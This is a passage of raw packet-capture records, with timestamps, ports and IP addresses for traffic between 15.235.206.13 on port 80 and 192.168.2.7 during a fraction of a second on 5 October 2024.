                                            Oct 5, 2024 14:36:18.382493019 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382508993 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382519007 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382525921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382541895 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382543087 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382567883 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382597923 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465081930 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465121984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465138912 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465167046 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465183020 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465184927 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465199947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465217113 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465219021 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465234041 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465244055 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465250969 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465267897 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465301991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465308905 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465318918 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465321064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465342999 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465359926 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465369940 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465405941 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465449095 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465465069 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465511084 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465559959 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465579987 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465596914 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465614080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465626001 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465629101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465653896 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465677023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465724945 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465764999 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465780973 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465795994 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465812922 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465821028 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465831995 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465847969 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.465859890 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.465895891 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466097116 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466114044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466130018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466145039 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466160059 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466188908 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466208935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466228008 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466248035 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466258049 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466269016 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466289997 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466305971 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466320992 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466336012 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466351986 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466356039 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466367960 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466384888 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466417074 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466742992 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466758966 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466906071 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466908932 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466921091 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466936111 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466950893 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466967106 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466983080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.466985941 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.466998100 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467012882 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467020035 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467031002 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467068911 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467278957 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467293978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467308998 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467324018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467333078 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467339039 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467355013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467364073 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467370033 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467390060 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467396021 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467416048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467430115 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467433929 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467453957 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467466116 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467473984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467493057 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467713118 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467730045 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467745066 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467760086 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467761993 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467788935 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467869997 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467888117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467902899 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467916965 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467917919 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467936993 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467943907 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467952013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467966080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467982054 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.467988968 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.467998028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468004942 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468013048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468014956 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468022108 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468101025 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468595028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468610048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468624115 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468638897 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468641043 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468655109 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468664885 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468671083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468688965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468688965 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468707085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468725920 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468730927 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468741894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468761921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468767881 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468782902 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468799114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468800068 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468815088 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468835115 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468842983 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468851089 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468867064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468875885 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468880892 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468897104 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468904018 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.468914032 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.468949080 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.469357014 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469372988 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469388008 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469403982 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469407082 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.469419003 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.469419003 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469434977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469450951 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469464064 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.469468117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.469494104 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.523164034 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.552979946 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553015947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553056002 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553091049 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553107023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553133965 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553184986 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553318977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553334951 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553349972 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553468943 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553484917 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553499937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553517103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553535938 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553575993 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553575993 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553613901 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553613901 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553620100 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553637028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553675890 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553786039 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553801060 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553816080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553832054 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553848028 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553848982 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553865910 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553873062 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553900003 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.553937912 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.553991079 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554146051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554162025 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554176092 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554191113 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554205894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554223061 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554224014 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554263115 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554284096 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554292917 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554310083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554399967 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554486036 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554501057 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554518938 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554559946 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554663897 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554680109 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554693937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554717064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554716110 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554760933 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554835081 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554852009 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554867029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554881096 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.554903030 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554945946 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.554990053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555006981 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555022001 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555051088 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555083990 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555171013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555186987 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555202961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555217981 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555233955 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555238008 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555249929 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555267096 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555280924 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555299044 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555304050 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555351973 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555670023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555685043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555701017 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555716991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555732965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555740118 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555752039 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555766106 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555768967 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555804968 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555811882 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555828094 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555843115 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555860043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555861950 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555875063 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555890083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555901051 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555943966 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.555985928 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.555999994 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556050062 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556183100 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556199074 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556238890 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556238890 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556253910 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556272984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556289911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556291103 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556305885 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556320906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556332111 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556346893 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556351900 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556363106 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556377888 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556394100 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556400061 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556408882 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556425095 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556428909 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556442976 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556452036 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556458950 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556474924 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556494951 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556502104 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556513071 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556518078 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556534052 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556548119 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556562901 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556577921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556595087 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556596041 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556596041 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556602955 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556618929 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556633949 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556649923 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556664944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556689024 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556704044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556719065 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556720018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556736946 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556754112 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556756020 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556770086 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556783915 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556796074 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556802034 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556818962 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556818962 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556834936 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556847095 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556852102 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556866884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556879997 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556881905 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556898117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556914091 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556921005 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556929111 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556946039 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556952953 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.556962967 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.556976080 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.557028055 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.638420105 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638453960 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638468027 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638516903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638540983 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638565063 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638581991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638664961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638679028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638758898 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.638775110 CEST804969915.235.206.13192.168.2.7
